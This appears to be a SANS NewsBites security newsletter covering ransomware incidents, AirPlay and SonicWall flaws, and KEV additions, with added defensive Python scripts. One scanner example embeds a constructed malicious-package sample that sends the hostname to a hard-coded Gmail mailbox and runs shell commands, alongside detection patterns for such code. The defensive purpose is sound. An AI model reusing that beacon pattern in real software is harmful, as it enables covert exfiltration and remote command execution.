Each year, the SANS Institute’s must-see keynote session at RSA Conference delivers a forward-looking briefing on the most critical and emerging attack vectors in cybersecurity. The 2025 session surfaced five new attack techniques that are reshaping how enterprises must think about cyber risk. Moderated by SANS Technology Institute President Ed Skoudis, the 45-minute session brought together top SANS experts to assess how today’s attackers are escalating both their technical sophistication and their impact on business operations.
The attack techniques outlined in the SANS RSAC 2025 keynote underscore a common theme: cybersecurity is no longer confined to the security operations center—it’s a leadership issue that impacts every layer of the enterprise. The threats of tomorrow demand a strategic, integrated response rooted in visibility, agility, and cross-functional alignment.
Read more about this year’s keynote:
www.sans.org/press/: RSAC 2025: The SANS Institute’s Top 5 Most Dangerous New Attack Techniques to Watch
www.sans.org/blog/: Inside RSAC 2025: The Five Emerging Attack Techniques That Demand Your Attention
Kintetsu World Express Recovering From Ransomware Attack
Following a cyberattack discovered April 23, 2025, Japanese freight logistics company Kintetsu World Express (KWE) has continued to update a “Customer Notice for Service Disruptions” page on their website, posting a separate update on April 28 identifying the incident as a ransomware attack. The company described the impact as “ongoing server failure,” stating that the system had not recovered and operations were still affected. KWE has established an Emergency Response Headquarters, has notified the Japanese police, and is working with external professionals to investigate the scope and cause of the incident. An April 30 update states that most systems are now fully functional while the company remediates and recovers systems, simultaneously “conducting a comprehensive environmental assessment” and “collaborating with external IT partners to enhance [their] environment using industry standard cybersecurity solutions.” Investigation is ongoing, and customers will be immediately notified if their data have been impacted.
Neely; NB May 2, 2025; Kintetsu World Express Recovering From Ransomware Attack
In April of 2024, the threat actor 888 compromised KWE, releasing names, emails, locations and countries of 819 of their clients. The question is, what was overlooked in the remediation process a year ago? Make sure you're looking at your entire security posture, not just affected systems. Consistent security, such as MFA across all systems, not only keeps the bar high, but also avoids having a weak link. Have a conversation about entry points and trust relationships, and how they can be better secured.
Pescatore; NB May 2, 2025; Kintetsu World Express Recovering From Ransomware Attack
Just my usual comment that the "pre" in "precautions" indicates actions that should best be taken *before* the cautionary event, not after. Also "… enhance our environment using industry standard cybersecurity solutions" should really be aiming higher – correct the deficiencies *and* raise the bar as a precaution against more sophisticated future attacks.
Dukes; NB May 2, 2025; Kintetsu World Express Recovering From Ransomware Attack
No country or company is immune to a ransomware attack. Ok, ok, perhaps one – DPRK. By now, every business is familiar with the term ransomware and its possible effect on their business. Use the handy resource, Blueprint for Ransomware Defense, as a guide for mitigation, response, and recovery. It’s been available for 3 years now. https://securityandtechnology.org/ransomwaretaskforce/blueprint-for-ransomware-defense/
Ascension Patient Data Breached Through Former Business Associate
Ascension Healthcare, which operates 142 hospitals across the US, has begun notifying patients of a third-party breach that compromised their personal and health information. According to a breach notification sent to patients, Ascension learned of the incident in early December 2024. A subsequent investigation found that "Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in third-party software used by the former business partner." This is not Ascension’s first encounter with breaches; a May 2024 ransomware attack prompted the company to notify 5.4 million people that their data had been compromised.
Neely; NB May 2, 2025; Ascension Patient Data Breached Through Former Business Associate
The former business partner appears to have been using Cleo's file transfer platform, which was compromised by the Cl0p ransomware gang. The question is, why was data still being transferred to the former partner? Data disposition steps, to include verified disabling of any file transfers and system interconnections as well as the disposition of data already shared, need to be active steps in the contract termination process. Review your contract management processes to ensure not only that your bases are covered but also that everyone knows the players involved.
Pescatore; NB May 2, 2025; Ascension Patient Data Breached Through Former Business Associate
Not a lot of information on how/why they "inadvertently disclosed information." I’d at least like to see statements in the "What we are doing now" section of these disclosures that detail "what we are doing now to make sure this doesn't happen again" vs. the usual offer of credit checking services.
Dukes; NB May 2, 2025; Ascension Patient Data Breached Through Former Business Associate
Seems like Ascension Healthcare needs to revisit its data retention and usage policies, again. Ascension said it's "…committed to the privacy and security of its patients’ information." Two cyber incidents in the span of a year makes that questionable. It's more like they're committed to a lackluster cybersecurity program.
Tech Companies Publish Draft OpenEoX Framework
A group of technology vendors has published a draft framework for a standard companies can use to announce end of support for their products. OpenEoX categorizes a product’s lifecycle into General Availability (GA), End of Sale (EoS), End of Security Support (EoSSec), and End of Life (EoL). The document, which was published through the Organization for the Advancement of Structured Information Standards (OASIS), notes that "Currently, information about End-of-Life (EoL), End-of-Security-Support (EoSSec), and other states for software, hardware, services and specifications is often fragmented and inconsistently defined across the industry." The project’s "core objectives" are transparency, efficiency, and unification.
Pescatore; NB May 2, 2025; Tech Companies Publish Draft OpenEoX Framework
Nothing major but a good step forward so that SBOM tools and other configuration management processes can more easily discover and send alerts on out-of-support software in use. IT needs to budget for realistic software replacement cycles.
Neely; NB May 2, 2025; Tech Companies Publish Draft OpenEoX Framework
Having consistent definitions and use of terms will help the enterprise with lifecycle planning. One hopes this will also translate to products and services targeted to SOHO environments as well. The much harder problem is acting on that plan. Have the hard conversation about how lifecycle activities will remain funded. Compare the outcome of that conversation to your plans regarding Windows 10's end of support this October.
Dukes; NB May 2, 2025; Tech Companies Publish Draft OpenEoX Framework
Having standardization around product lifecycle terms is a good thing. It’s a bit surprising that this has never been done. That said, it doesn’t solve the problem of organizations knowingly running obsolete products (HW/SW), but then, that’s what we have litigation for.
Murray; NB May 2, 2025; Tech Companies Publish Draft OpenEoX Framework
Worthy and useful idea. It suggests that this lifecycle is a limitation to the value of a product and should be planned and published as part of the announcement of the product.
ICO Will Not Investigate British Library’s 2023 Ransomware Attack
The UK Information Commissioner’s Office (ICO) will not investigate a 2023 ransomware attack that disrupted the British Library’s operations for months. The Library reported the incident to ICO in October 2023 and subsequently published a detailed review of the incident in March 2024: the "likely … point of entry" was determined to be a server that was not protected with multi-factor authentication (MFA). In a recent statement, the ICO writes that "further investigation would not be the most effective use of [their] resources." The decision is indicative of a government stance that avoids imposing penalties on organizations responding to ransomware attacks with best practices. The ICO writes that they "commend the British Library for being open and transparent about its system vulnerabilities that contributed to the incident, the impact it has had, and the improvements made so far to protect people’s personal information."
Dukes; NB May 2, 2025; ICO Will Not Investigate British Library’s 2023 Ransomware Attack
The 'carrot and stick' metaphor seems appropriate in this case. ICO believes the actions taken by the British Library both during and after the ransomware event should be rewarded, hence the 'carrot.' Far too many institutions seek to limit exposure, not even referring to the event as a ransomware attack, nor publishing a cyber incident review. In those cases, the 'stick' is more appropriate.
Read more: The Record, The Register, ICO, BL
Apple AirPlay Devices Vulnerable to Zero-Click RCE
Oligo Security has published a blog post describing their discovery of 23 vulnerabilities in the Apple AirPlay software development kit (SDK) and AirPlay Protocol. Oligo emphasizes the enormous number of potentially vulnerable devices, as these flaws affect iOS, iPadOS, macOS Sequoia, Sonoma, and Ventura, visionOS, watchOS, tvOS, and CarPlay, as well as tens of millions of "third-party devices that leverage the AirPlay SDK," such as speakers. Attackers could exploit these vulnerabilities to carry out attacks via shared wireless networks or peer-to-peer connections; two of the flaws are wormable, zero-click RCE vulnerabilities that could allow attackers to "deploy malware that spreads to devices on any local network the infected device connects to." Possible attacks enabled by these flaws include "Remote Code Execution (RCE), Access Control List (ACL) and user interaction bypass, Local Arbitrary File Read, Sensitive Information Disclosure, Man-in-the-Middle (MITM) attacks, and Denial of Service (DoS) attacks." The researchers have dubbed the collection of chainable flaws and attack vectors "AirBorne." Users are urged to update all devices to the latest software versions; Oligo also recommends disabling AirPlay Receiver, restricting AirPlay access via firewall rules, and restricting AirPlay settings to only allow AirPlay for "Current User."
Neely; NB May 2, 2025; Apple AirPlay Devices Vulnerable to Zero-Click RCE
Apple released fixes for AirBorne in iOS/iPadOS 18.4, macOS 13.7.5, 14.7.5 and 14.5, visionOS 2.4 and watchOS 11.4. Make sure that your devices are running these versions or newer. Setting AirPlay to "Current User" restricts access to devices logged into the same Apple Account. If you're not using AirPlay receiver, turn it off. Make sure your IoT devices run current firmware, and consider monitoring/limiting use of AirPlay (port 7000) on your network; document this decision so you don't have a recurring agenda item.
Dukes; NB May 2, 2025; Apple AirPlay Devices Vulnerable to Zero-Click RCE
Pretty incredible research by Oligo, and kudos to them for responsibly working with AAPL before releasing their findings. Outside the severity of the vulnerabilities, the report highlights a continued weakness of the third-party product ecosystem. AAPL has done its part, creating software updates for its affected products; now third-party vendors that use the SDK must do their part. Some will, some won't, and of course users must download and install the software patch. We may be talking about this for quite some time.
Read more: Oligo, Ars Technica, BleepingComputer, SecurityWeek
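The patch-level check the summary and comments above call for, as an added example (not Oligo's or Apple's code). The device inventory is constructed. The minimums for iOS/iPadOS 18.4, macOS 13.7.5 and 14.7.5, visionOS 2.4 and watchOS 11.4 are the versions cited above; macOS 15.4 and tvOS 18.4 follow Apple's published fix list for these issues and should be confirmed against Apple's security release notes before the table is relied on. The point the code makes is that macOS has three patched release trains, so the comparison is per major version rather than against one global number, and that a device on an unlisted train, or a third-party AirPlay SDK product, cannot be judged from Apple's table and has to be flagged for manual review.

```python
"""Check an Apple device inventory against the minimum OS versions fixed for AirBorne.

Added example; not Oligo's or Apple's code. DEVICES is a constructed inventory.
Minimums for iOS/iPadOS 18.4, macOS 13.7.5 and 14.7.5, visionOS 2.4 and watchOS 11.4
are those cited in the newsletter; macOS 15.4 and tvOS 18.4 follow Apple's published
fix list and should be confirmed against Apple's release notes.
"""

# Per-train minimums. macOS keeps three release trains in support, so the required
# version depends on the major version the device is already running.
PATCHED_MIN = {
    "iOS":      {18: (18, 4)},
    "iPadOS":   {18: (18, 4)},
    "macOS":    {13: (13, 7, 5), 14: (14, 7, 5), 15: (15, 4)},   # 15.4: see docstring
    "visionOS": {2: (2, 4)},
    "watchOS":  {11: (11, 4)},
    "tvOS":     {18: (18, 4)},                                   # see docstring
}


def parse_version(text):
    """'14.7.5' -> (14, 7, 5). A trailing build tag such as '18.4 (22E240)' is ignored."""
    return tuple(int(part) for part in text.split()[0].split("."))


def is_patched(os_name, version_text):
    """Return (verdict, reason); verdict is True, False, or None when the table cannot judge."""
    try:
        version = parse_version(version_text)
    except (ValueError, IndexError):
        return None, f"unparseable version {version_text!r}"
    trains = PATCHED_MIN.get(os_name)
    if trains is None:
        # Third-party AirPlay SDK firmware: Apple's table says nothing, ask the vendor.
        return None, f"no fix data for {os_name}; check the vendor's advisory"
    major = version[0]
    minimum = trains.get(major)
    if minimum is None:
        if major > max(trains):
            return True, "newer major release than the fixed trains"
        return False, f"{os_name} {major}.x is not in the fix list; move to a supported train"
    # Tuple comparison copes with unequal lengths: (18, 4, 1) >= (18, 4) and (18, 4) >= (18, 4).
    if version >= minimum:
        return True, "at or above the fixed version"
    return False, "needs " + ".".join(map(str, minimum)) + " or newer"


# Constructed inventory: (hostname, os, reported version).
DEVICES = [
    ("mbp-sales-01", "macOS", "14.7.4"),
    ("mbp-eng-07", "macOS", "15.4.1"),
    ("imac-lobby", "macOS", "12.7.6"),
    ("iphone-ceo", "iOS", "18.3.2"),
    ("ipad-kiosk", "iPadOS", "18.4"),
    ("appletv-boardroom", "tvOS", "18.2"),
    ("speaker-lobby", "ThirdPartyFirmware", "2.1.0"),
]


def audit(devices):
    """Evaluate (hostname, os, version) triples; returns [(hostname, verdict, reason), ...] in order."""
    return [(host, *is_patched(os_name, ver)) for host, os_name, ver in devices]


def unpatched(devices):
    """Hostnames that are definitely below the fixed version or on a train with no fix."""
    return [host for host, ok, _ in audit(devices) if ok is False]


def needs_review(devices):
    """Hostnames the table cannot judge (third-party firmware, unparseable versions)."""
    return [host for host, ok, _ in audit(devices) if ok is None]


if __name__ == "__main__":
    for host, verdict, reason in audit(DEVICES):
        label = {True: "ok", False: "PATCH", None: "REVIEW"}[verdict]
        print(f"{label:<7}{host:<20}{reason}")
```

Feed it whatever your MDM exports; the only assumption is that the OS name and version string are available per device. Treat every REVIEW line as a real task, since the third-party SDK devices Dukes mentions are exactly the ones with no Apple data behind them.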
Microsoft informed Daniel Wade, an independent security researcher, that he is not the first to express alarm that Windows Remote Desktop Protocol (RDP) allows logins using revoked passwords, an issue which Wade says "isn't just a bug. It's a Trust Breakdown" because users expect a password change to curb unauthorized access. Wade's report states that "even newer passwords may be ignored while older ones continue to function," bypassing cloud verification, MFA, and Conditional Access policies to allow persistent RDP access. Microsoft has been aware of the issue since 2023 and does not consider it a vulnerability, claiming it is "a design decision to ensure that at least one user account always has the ability to log in no matter how long a system has been offline." After RDP authenticates a user's first login online, the credential is then stored locally in an encrypted format and used to validate future logins. If a user changes their Microsoft or Azure password in the cloud, the cached encrypted local credential is not updated or removed, so the old password will still grant access to the machine. Will Dormann, senior vulnerability analyst at Analygence, believes that Microsoft's updated documentation notifying users of password caching is not adequate, and he notes that if a Microsoft or Azure account is compromised, "the only course of action is to configure RDP to authenticate against locally stored credentials only."
CISA Adds Flaws to KEV from Broadcom Brocade Fabric OS, Qualitia Active! Mail, and Commvault Web Servers
The US Cybersecurity and Infrastructure Security Agency (CISA) has added three vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, one each affecting Broadcom Brocade Fabric OS, Qualitia Active! Mail clients, and Commvault Web Servers. CVE-2025-1976, CVSS score 8.6, patched in Brocade Fabric OS 9.1.1d7, allows an attacker with admin privileges to “execute arbitrary code as if they had full root level access,” potentially executing existing commands or modifying the OS itself, due to a flaw in IP address validation. CVE-2025-42599, CVSS score 9.8, fixed in Qualitia Active! Mail 6 BuildInfo: 6.60.06008562, allows a remote unauthenticated attacker to execute arbitrary code or create a denial-of-service (DoS) condition by sending a specially crafted request, due to a stack-based buffer overflow vulnerability. CVE-2025-3928, CVSS score 8.7, fixed in Commvault software versions 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux, allows a remote unauthenticated attacker to compromise webservers by creating and executing webshells, due to an unspecified vulnerability. Commvault disclosed the zero-day exploitation in a March 7, 2025 advisory, stating that the attacker was a “suspected nation-state threat actor,” following up on April 27, 2025 to add that they are working with affected customers, and “there has been no unauthorized access to customer backup data that Commvault stores and protects, and no material impact on our business operations or our ability to deliver products and services.” The update shares best practices and indicators of compromise (IoCs), and states that Commvault is working with the FBI and CISA while improving key rotation and monitoring rules.
Neely; NB May 2, 2025; CISA Adds Flaws to KEV from Broadcom Brocade Fabric OS, Qualitia Active! Mail, and Commvault Web Servers
If you're using Brocade's Fabric OS, you should be on version 9.2 or higher. Version 9.1 removed the direct root access but still has admin roles the exploit leverages. 9.2 better refines the admin role management. Note the Commvault update only applies to self-hosted instances, the SaaS version has been updated. After installing the update, make sure that you're following their updated security best practices. These KEV entries have a due date of May 19th.
Read more: CISA, Broadcom, Commvault, BleepingComputer, SecurityWeek
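Turning the KEV due dates Neely mentions into a routine check, as an added example that is not CISA's code: the script below parses a document in the shape of CISA's KEV JSON feed, keeps only the entries that match a product inventory, and labels each one scheduled, due soon or overdue relative to a given date. The JSON is constructed for the example (the real feed is published at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json and carries more fields per entry); the CVE IDs, products and due dates are the ones reported in this issue, while the dateAdded values are illustrative.

```python
"""Triage a CISA KEV feed against a product inventory and flag approaching due dates.

Added example; not CISA's code. SAMPLE_KEV_JSON is constructed in the shape of the
real feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
CVE IDs, products and due dates follow the newsletter; dateAdded values are illustrative.
"""
import json
from datetime import date

SAMPLE_KEV_JSON = """
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2025-1976", "vendorProject": "Broadcom", "product": "Brocade Fabric OS",
     "dateAdded": "2025-04-28", "dueDate": "2025-05-19", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-42599", "vendorProject": "Qualitia", "product": "Active! Mail",
     "dateAdded": "2025-04-28", "dueDate": "2025-05-19", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-3928", "vendorProject": "Commvault", "product": "Web Server",
     "dateAdded": "2025-04-28", "dueDate": "2025-05-19", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2023-44221", "vendorProject": "SonicWall", "product": "SMA100 Appliances",
     "dateAdded": "2025-05-01", "dueDate": "2025-05-22", "knownRansomwareCampaignUse": "Unknown"}
  ]
}
"""


def parse_kev(raw_json):
    """Return the vulnerability list from a KEV feed document."""
    return json.loads(raw_json)["vulnerabilities"]


def in_inventory(entry, inventory):
    """True if the entry's vendor or product contains any inventory name (case-insensitive)."""
    haystack = f"{entry['vendorProject']} {entry['product']}".lower()
    return any(name.lower() in haystack for name in inventory)


def triage(raw_json, inventory, today, warn_days=7):
    """KEV entries relevant to `inventory`, sorted by due date, each with a status label.

    `today` may be a date or an ISO string; entries within `warn_days` are DUE SOON.
    """
    if isinstance(today, str):
        today = date.fromisoformat(today)
    rows = []
    for entry in parse_kev(raw_json):
        if not in_inventory(entry, inventory):
            continue
        days_left = (date.fromisoformat(entry["dueDate"]) - today).days
        if days_left < 0:
            status = "OVERDUE"
        elif days_left <= warn_days:
            status = "DUE SOON"
        else:
            status = "scheduled"
        rows.append({
            "cve": entry["cveID"],
            "product": f"{entry['vendorProject']} {entry['product']}",
            "due": entry["dueDate"],
            "days_left": days_left,
            "status": status,
            "ransomware": entry.get("knownRansomwareCampaignUse", "Unknown"),
        })
    rows.sort(key=lambda r: (r["due"], r["cve"]))
    return rows


if __name__ == "__main__":
    # Constructed inventory: the names only need to appear in vendorProject or product.
    for row in triage(SAMPLE_KEV_JSON, ["Brocade", "Commvault", "SonicWall"], "2025-05-02"):
        print(f"{row['status']:<10}{row['due']} ({row['days_left']:>3}d) {row['cve']:<16}{row['product']}")
```

Substring matching on vendor and product is deliberately loose so that "Brocade" catches an entry filed under Broadcom; tighten it to your CMDB's naming once the list of false positives is known. The KEV due dates bind US federal civilian agencies, but they are a reasonable default SLA for anyone.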
Older SonicWall Vulnerabilities are Being Actively Exploited
SonicWall has updated two security advisories – one from 2024 and another from 2023 – to indicate that the vulnerabilities they address are now being actively exploited. Both advisories address multiple vulnerabilities in SonicWall SMA100 SSL-VPN. The flaw from the 2024 advisory (CVE-2024-38475) that is being exploited is a critical path traversal vulnerability that "allows an attacker to map URLs to file system locations that are permitted to be served by the server." The flaw from the 2023 advisory (CVE-2023-44221) that is being exploited is a high-severity post authentication OS command injection vulnerability that "allows a remote authenticated attacker with administrative privilege to inject arbitrary commands as a 'nobody' user." The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-44221 to the Known Exploited Vulnerabilities (KEV) catalog on May 1 with a mitigation due date of May 22.
Neely; NB May 2, 2025; Older SonicWall Vulnerabilities are Being Actively Exploited
The time to hold off on the SonicWall updates is past. Double check the product lifecycle tables for your SonicWall devices: you may find the fix is replacement. Yes, they still work, so do the exploits, and I feel your pain. CVE-2023-44112, command injection flaw, has a CVSS score of 7.2; CVE-2024-38475, improper escaping of output, has a CVSS score of 9.1; and the old SonicWall SMA 100 flaw, which is also being exploited, CVE-2021-20035, command injection flaw, has a CVSS score of 6.5.
Read more: SecurityWeek, SCWorld, BleepingComputer, SonicWall (both advisories), NVD (both CVE entries)
Two More British Retailers Targeted by Attempted Cyberattacks
Following close on the heels of a cyberattack that has disrupted operations at British retailer Marks & Spencer, both the Co-op and Harrods have reported being targeted by cyberattacks. On Wednesday, April 30, the Co-op shut down portions of their IT systems after they detected an attempted intrusion, disrupting the company’s back office and call center. On Thursday, May 1, Harrods reported that they "recently experienced attempts to gain unauthorised access to some of [their] systems …[and they] have restricted internet access at [their] sites." These attacks come days after Marks & Spencer experienced an attack that has caused them to temporarily shut down operations of their online stores.
Neely; NB May 2, 2025; Two More British Retailers Targeted by Attempted Cyberattacks
Co-op is a competitor to M&S with about 3000 locations. Both Co-op and Harrods were able to take proactive steps to block/contain the attack, minimizing customer impact. Even so, Co-op has taken the added measure of requiring cameras to be on for meetings due to suspicions of hackers being present. Not a bad reminder: we should be confirming attendees at business meetings, as well as checking how recently recurring meeting attendees and credentials were verified/updated.
Read more: The Record, The Guardian (2), BleepingComputer (2), BBC
Chrome and Firefox Updates Address Multiple Vulnerabilities
Google and Mozilla have released updates for their Chrome and Firefox browsers to address multiple vulnerabilities. Google released Chrome 136 to the stable channel; the newest version of Chrome addresses eight vulnerabilities, four of which were brought to Google’s attention by external researchers. Of those, one is rated high-severity; the other three are rated medium- and low-severity. Mozilla released Firefox 138, which addresses 11 vulnerabilities, four of which are rated high-severity.
Neely; NB May 2, 2025; Chrome and Firefox Updates Address Multiple Vulnerabilities
Bet you just checked your About Chrome/About Firefox to see what version was running. It's easy to ignore the update available indicator; I'm thinking I need a calendar reminder to make sure I'm keeping my personal devices updated. Don't forget those VMs you infrequently use, or that laptop in the closet, you know the one you grab on the way out, planning to apply updates at the airport? Make sure that your IT staff is all over getting these updates deployed. If you're using Firefox ESR, 128.10.0 was released April 29 to address these same flaws. ESR 139 release is scheduled for late May, and available in beta now.
Murray; NB May 2, 2025; Chrome and Firefox Updates Address Multiple Vulnerabilities
Prefer single-purpose-built clients for sensitive applications. The chances that all browsers are even current, much less reliable, are vanishingly small.
Internet Storm Center StormCast Friday, May 2, 2025
More Steganography; Malicious Python Packages Gmail C2; BEC to Steal Rent Payments
https://isc.sans.edu/podcastdetail/9434
Steganography Analysis With pngdump.py: Bitstreams
More details from Didier as to how to extract binary content hidden inside images
https://isc.sans.edu/diary/Steganography+Analysis+With+pngdumppy+Bitstreams/31904
Using Trusted Protocols Against You: Gmail as a C2 Mechanism
Attackers are using typosquatting to trick developers into installing malicious Python packages. These packages use Gmail as a command and control channel, sending email to hard-coded Gmail accounts.
https://socket.dev/blog/using-trusted-protocols-against-you-gmail-as-a-c2-mechanism
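A static triage check for the pattern described above (a lookalike package name plus a hard-coded Gmail mailbox used as a beacon), as an added example that is not Socket's tooling and not code from the packages they analysed. The popular-package shortlist, the indicator patterns and the sample package source are all constructed for this example; the sample imitates the shape of the technique (SMTP to Gmail, a hard-coded recipient, a shell-execution sink) without being real malware. The scoring combines three independent signals because each one alone is common in legitimate code: plenty of packages send mail, and plenty have names one edit away from something popular.

```python
"""Triage a package for the typosquat + Gmail-beacon pattern.

Added example; not Socket's tooling and not code from the packages they analysed.
POPULAR, INDICATORS and SAMPLE_SOURCE are constructed for this example.
"""
import re

POPULAR = ["requests", "numpy", "pandas", "urllib3", "boto3", "cryptography"]  # constructed shortlist


def edit_distance(a, b):
    """Levenshtein distance (insert, delete, substitute) by row-wise dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, popular=POPULAR, max_distance=2):
    """Popular names within max_distance edits of name; an exact match is the real package, not a squat."""
    name = name.lower()
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]


GMAIL_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@gmail\.com", re.I)
INDICATORS = {
    "gmail_server": re.compile(r"\b(?:smtp|imap)\.gmail\.com\b", re.I),
    "mail_lib":     re.compile(r"\b(?:import|from)\s+(?:smtplib|imaplib)\b"),
    "exec_sink":    re.compile(r"\b(?:exec|eval)\s*\(|\bsubprocess\.\w+\s*\(|\bos\.system\s*\("),
}


def scan_source(source):
    """Which indicators fire in the source, plus every hard-coded Gmail address found."""
    hits = {key: bool(pat.search(source)) for key, pat in INDICATORS.items()}
    hits["gmail_addresses"] = sorted({a.lower() for a in GMAIL_ADDR.findall(source)})
    return hits


def assess(package_name, source):
    """Combine name lookalike, Gmail mailflow and an execution sink into a risk level with reasons."""
    lookalikes = typosquat_candidates(package_name)
    hits = scan_source(source)
    reasons = []
    if lookalikes:
        reasons.append(f"name is within 2 edits of {lookalikes}")
    if hits["gmail_addresses"]:
        reasons.append(f"hard-coded Gmail mailbox(es) {hits['gmail_addresses']}")
    if hits["gmail_server"] or hits["mail_lib"]:
        reasons.append("sends or reads mail (Gmail server / smtplib / imaplib)")
    if hits["exec_sink"]:
        reasons.append("executes dynamic code or shell commands")
    # Three independent signals; any one alone is common in benign packages.
    signals = (bool(lookalikes), bool(hits["gmail_addresses"] or hits["gmail_server"]), hits["exec_sink"])
    score = sum(signals)
    risk = "high" if score == 3 else "medium" if score == 2 else "low"
    return {"package": package_name, "risk": risk, "lookalikes": lookalikes,
            "reasons": reasons, "indicators": hits}


# Constructed sample imitating the shape of the technique; not real malware.
SAMPLE_SOURCE = '''
import smtplib, socket, subprocess
from email.mime.text import MIMEText

OPERATOR = "ops.relay.example@gmail.com"   # hard-coded mailbox (constructed)

def beacon():
    msg = MIMEText(socket.gethostname())
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login("dropbox.acct.example@gmail.com", "app-password")
    s.sendmail(OPERATOR, [OPERATOR], msg.as_string())

def run(cmd):
    return subprocess.check_output(cmd, shell=True)
'''

if __name__ == "__main__":
    for name, src in [("requets", SAMPLE_SOURCE), ("mycompany-reporting", "import json\n")]:
        result = assess(name, src)
        print(f"{name}: {result['risk']}")
        for reason in result["reasons"]:
            print(f"  - {reason}")
```

Run it over every file in a freshly downloaded sdist or wheel before the package reaches a build host; the name check wants your organisation's own list of heavily used dependencies rather than the six-entry placeholder here.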
Security Brief: French BEC Threat Actor Targets Property Payments
A French business email compromise threat actor is targeting property management firms to send emails to tenants tricking them into sending rent payments to fake bank accounts
SANS.edu Research Journal
https://isc.sans.edu/j/research
Internet Storm Center StormCast Thursday, May 1, 2025
SonicWall Attacks; Spoofing Adversary in the Middle Attacks; Cached Windows RDP Credentials
https://isc.sans.edu/podcastdetail/9432
Web Scanning for SonicWall Vulnerabilities CVE-2021-20016
For the last week, scans for SonicWall API “login” and “domain” endpoints have skyrocketed. These attacks may be exploiting an older vulnerability or just attempting to brute force credentials.
https://isc.sans.edu/diary/Web+Scanning+Sonicwall+for+CVE202120016/31906
The Wizards APT Group SLAAC Spoofing Adversary in the Middle Attacks
ESET published an article with details regarding an IPv6-linked attack they have observed. Attackers use router advertisements to inject fake recursive DNS servers that are used to inject IP addresses for hostnames used to update software. This leads to the victim downloading malware instead of legitimate updates.
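The RA/RDNSS mechanism ESET describes, as an added example that is not ESET's code and not a reconstruction of the group's tooling: the block builds ICMPv6 Router Advertisements (RFC 4861) carrying an RDNSS option (RFC 8106) and then parses them the way a detector on a monitoring host would, flagging any advertised recursive DNS server that is not on an allowlist and any RA sourced from an unknown router MAC. All addresses and MACs are constructed (documentation ranges); the builder exists only so the example runs offline.

```python
"""Detect rogue RDNSS servers in IPv6 Router Advertisements.

Added example; not ESET's code. Builds RAs (RFC 4861) with an RDNSS option
(RFC 8106) from constructed values, then parses them as a detector would.
Checksums are left zero: the ICMPv6 pseudo-header is not needed for parsing.
"""
import ipaddress
import struct

ND_ROUTER_ADVERT = 134
OPT_SOURCE_LLADDR = 1
OPT_RDNSS = 25


def build_ra(router_mac, dns_servers, router_lifetime=1800, rdnss_lifetime=3600):
    """ICMPv6 RA payload: 16-byte header, source link-layer option, one RDNSS option."""
    hdr = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, router_lifetime, 0, 0)
    sll = struct.pack("!BB", OPT_SOURCE_LLADDR, 1) + bytes.fromhex(router_mac.replace(":", ""))
    addrs = b"".join(ipaddress.IPv6Address(a).packed for a in dns_servers)
    # RDNSS length is in 8-octet units: 8-byte option header plus 16 bytes per address.
    rdnss = struct.pack("!BBHI", OPT_RDNSS, 1 + 2 * len(dns_servers), 0, rdnss_lifetime) + addrs
    return hdr + sll + rdnss


def parse_ra(payload):
    """Parse the RA header and walk its options; raises ValueError on malformed input."""
    if len(payload) < 16 or payload[0] != ND_ROUTER_ADVERT:
        raise ValueError("not a Router Advertisement")
    router_lifetime = struct.unpack("!BBHBBHII", payload[:16])[5]
    ra = {"router_lifetime": router_lifetime, "source_mac": None, "rdnss": []}
    off = 16
    while off < len(payload):
        if off + 2 > len(payload):
            raise ValueError("truncated option header")
        opt_type, opt_len = payload[off], payload[off + 1]
        if opt_len == 0:                       # RFC 4861 requires discarding zero-length options
            raise ValueError("zero-length option")
        end = off + opt_len * 8
        if end > len(payload):
            raise ValueError("option runs past end of packet")
        body = payload[off + 2:end]
        if opt_type == OPT_SOURCE_LLADDR:
            ra["source_mac"] = ":".join(f"{b:02x}" for b in body[:6])
        elif opt_type == OPT_RDNSS:
            lifetime = struct.unpack("!I", body[2:6])[0]      # body[0:2] is reserved
            for i in range(6, len(body) - 15, 16):
                ra["rdnss"].append((str(ipaddress.IPv6Address(body[i:i + 16])), lifetime))
        off = end                                            # unknown options are skipped, not fatal
    return ra


def check_ra(payload, expected_dns, expected_router_macs):
    """Alerts for RAs from unknown routers or advertising DNS servers outside the allowlist."""
    ra = parse_ra(payload)
    alerts = []
    if ra["source_mac"] not in expected_router_macs:
        alerts.append(f"RA from unexpected router {ra['source_mac']}")
    allowed = {str(ipaddress.IPv6Address(a)) for a in expected_dns}
    for addr, lifetime in ra["rdnss"]:
        if lifetime == 0:
            continue                                         # lifetime 0 withdraws a server, it does not install one
        if addr not in allowed:
            alerts.append(f"rogue RDNSS server {addr} from {ra['source_mac']} (lifetime {lifetime}s)")
    return alerts


# Constructed policy: one legitimate router and one resolver, documentation addresses.
EXPECTED_ROUTERS = {"00:11:22:33:44:55"}
EXPECTED_DNS = ["2001:db8::53"]

if __name__ == "__main__":
    legit = build_ra("00:11:22:33:44:55", ["2001:db8::53"])
    rogue = build_ra("02:de:ad:be:ef:01", ["fd00::1", "2001:db8::53"])
    for label, pkt in (("legit", legit), ("rogue", rogue)):
        print(label, check_ra(pkt, EXPECTED_DNS, EXPECTED_ROUTERS) or ["no alerts"])
```

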